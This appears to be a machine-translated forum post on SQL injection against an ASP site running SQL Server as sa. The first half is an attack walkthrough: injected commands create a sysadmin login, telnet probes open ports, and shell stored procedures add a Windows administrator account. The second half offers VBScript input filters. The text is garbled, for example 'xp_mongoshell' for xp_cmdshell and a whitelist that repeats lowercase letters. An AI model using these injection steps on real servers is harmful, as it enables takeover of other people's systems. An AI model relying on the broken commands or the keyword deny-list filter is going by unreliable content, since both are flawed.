A lot of people use the SA when publishing the database, plus "select .. where name = "+ request. querystring ["name"]: How is the result ?!
[For details about the length, check the specific commands]
Change the value of request. querystring ["name"]:
1. Exec master. DBO. sp_addlogin Test, test, Master -- // create a user
2. Exec master. DBO. SP_ADDSRVROLEMEMBER 'test', 'sysadmin' -- // upgrade user test to an Administrator group.
Use Telnet www. ****. com 1433 to check whether remote login is allowed ..
No?
Look down
As the security awareness of the people who programming above is not high, look at the ports on his machine.
Telnet www. ***. com 1433
Telnet www. ***. com 3389
Telnet www. ****. com 21
Telnet www. ***. com 139
Telnet www. ***. com 445
Most of them are open. Let's assume all of them are open!
Run the following stored procedures in the SQL query analyzer.
Exec master. DBO. xp_mongoshell 'net user test/workstations: */times: All/passwordchg: yes/passwordreq: yes/active: yes/add'
Exec master. DBO. xp_mongoshell 'net localgroup administrators test/add'
In this way, you have created a system account in the system, and the SQL account is created on test.
I will not elaborate on what I want to do in the future. If you have any questions, I will answer them.
Attack prevention:
Method 1: Filter Single quotes
Function escape (input)
Input = Replace (input ,"'","''")
Escape = Input
End Function
Method 2: reject known error Input
Function validate_string (input)
Known_bad = array ("select", "insert", "Update", "delete", "Drop ","-","'")
Validate_string = true
For I = lbound (known_bad) to ubound (known_bad)
If (instr (1, input, known_bad (I), vbtextcompare) <> 0) then
Validate_string = false
Exit Function
End if
Next
End Function
Method 3-only allow correct input
Function validatepassword (input)
Good_password_chars = "abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz0123456789"
Validatepassword = true
For I = 1 to Len (input)
C = mid (input, I, 1)
If (instr (good_password_chars, c) = 0) then
Validatepassword = false
Exit Function
End if
Next
End Function
Http://community.csdn.net/Expert/topic/3129/3129144.xml? Temp =. 5659296.